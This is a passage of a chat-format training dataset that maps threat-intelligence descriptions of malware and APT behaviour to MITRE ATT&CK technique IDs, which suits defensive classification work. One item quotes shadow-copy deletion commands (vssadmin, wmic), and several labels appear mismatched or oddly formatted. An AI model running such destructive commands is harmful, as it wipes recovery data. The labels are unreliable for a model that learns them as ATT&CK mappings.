- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SQLRat has used PowerShell to create a Meterpreter session."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowGoop has the ability to use PowerShell scripts to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can create a remote shell and run a given command."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call \"EnumWindows\", and checking for Qemu guest agent."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more"
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can migrate into another process using reflective DLL injection."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application"
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to enumerate local network connections, including active TCP connections and other network statistics."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There is a variant of RATANKBA that uses a PowerShell script instead of the traditional PE form."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has used certutil -decode to decode files on the victim’s machine when dropping ."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first shellcode decrypts a further shellcode block"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deletes rules in the Windows Defender Firewall exception list related to AnyDesk "
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has sent spearphishing emails containing malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "queries Registry keys in preparation for setting Run keys to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use WMI queries to gather system information."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for files on attached removable drives based on a predefined list of file extensions every five seconds."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server"
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collected file listings of all default Windows directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 – A list of file extensions targeted for destruction by new variant of KillDisk component As well as being able to delete system files to make the system unbootable – functionality typical for such destructive trojans – the KillDisk variant detected in the electricity distribution companies also appears to contain some additional functionality specifically intended to sabotage industrial systems"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Before exfiltration, Okrum's backdoor has used hidden files to store logs and outputs from backdoor commands."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This request is followed by a call to “GetisrunasAbById” to determine if the Trojan should use “runas” to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has enumerated programs installed on an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ZIP archive contains a RAR SFX which installs the malware and shows an empty PDF decoy"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can query the Kubernetes API for secrets."
- },
- {
- "role": "assistant",
- "content": "T1552.007 - Kubernetes List Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar can overwrite files with random data before deleting them."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan sends an email to sahro.bella7[at]post.cz with sysscr.ops as the attachment, the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts. If the actor wishes to download an additional payload to the compromised host, they will respond by sending emails in the following steps. 3) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body. This secondary email account is unknown at this time, so we will refer to it as \"secondary email account\" in future steps. 4) The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account. 7) The actor sends an email to trala.cosh2[at]post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload. 8) Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier. Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file. 12) Cannon moves the downloaded file to the specified path"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deletes the registry key HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open Deletes the dropper components from the system"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However the application is not a service of Yahoo or a legitimate product of McAfee, but a rogue application used by Pawn Storm. Clicking on the “Agree” button would give Pawn Storm an OAuth token and access to the targets’ mailbox. The group then gains access to the mailbox until the token gets revoked by the service provider or the target"
- },
- {
- "role": "assistant",
- "content": "T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoxCaon can collect the victim's MAC address by using the \"GetAdaptersInfo\" API."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT has registered itself as a service to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has been delivered via phishing emails which contained malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth can be loaded through regsvr32.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can adjust token privileges."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy compresses all of the stolen data into a .cab file and uploads it to the attacker’s C&C servers"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used various methods of process injection including hot patching."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When a document is found matching one of the extensions in the configuration, uploads it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services (IIS)."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JHUHUGIT variant takes screenshots by simulating the user pressing the \"Take Screenshot\" key (VK_SCREENSHOT), accessing the screenshot saved in the clipboard, and converting it to a JPG image."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In some cases, the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated. This makes the analysis more difficult"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Various implementations of CHOPSTICK communicate with C2 over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 accessed email accounts using Outlook Web Access."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs several anti-VM and sandbox checks on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser's code may be obfuscated through structured exception handling and return-oriented programming."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Different colors show the three dropped modules: legit app (blue), launcher (green), and decompressor with the Trojan embedded (red) The initial module drops three files that are typical for Chinese-speaking actors: a legit Symantec pcAnywhere (IntgStat.exe) for DLL side loading, a .dll launcher (pcalocalresloader.dll) and the last-stage decompressor (thumb.db)"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, it will copy the first stage shellcode in memory and create a new thread with the shellcode running in it, the code responsible for this execution is shown in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to manage an automated queue of egress files and commands sent to its C2."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WINERACK can enumerate services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has created a scheduled task named \"Maintenance\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may collect active network connections by running netstat -an on a victim."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has used multiple layers of obfuscation to avoid analysis, including its Base64 encoded payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner can automatically launch at startup if the AutoStart option is enabled in the VBoxVmService configuration file."
- },
- {
- "role": "assistant",
- "content": "T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "C2 traffic from is encrypted, then encoded with Base64 encoding."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have most definitely observed Kimsuky targeting specific individuals — in fact, up to the present moment — even going as far as registering Internet domains containing the individual targets' names, the PwC analyst said"
- },
- {
- "role": "assistant",
- "content": "T1583.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can use base64 encoding, string stacking, and opaque predicates for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has the ability to communicate over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team's CredRaptor tool can collect saved passwords from various internet browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon checks the running processes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the wiping procedure, the malware tries to delete the shadow copies by running the following commands: vssadmin.exe delete shadows /all /quiet **and **C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete. Finally, the malware enters an infinite loop where it sleeps based on the is_alive_loop_interval value from the configuration file and writes \"Meteor is still alive"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has used HTTPS over ports 2083 and 2087 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then the article describes how, since the beginning of 2019, the group has been leveraging self-extracting archives to run code"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can record keystrokes from both the keyboard and virtual keyboard."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors have used DLL side-loading. Actors have used legitimate Kaspersky anti-virus variants in which the DLL acts as a stub loader that loads and executes the shell code."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp encrypts its configuration and payload."
- },
- {
- "role": "assistant",
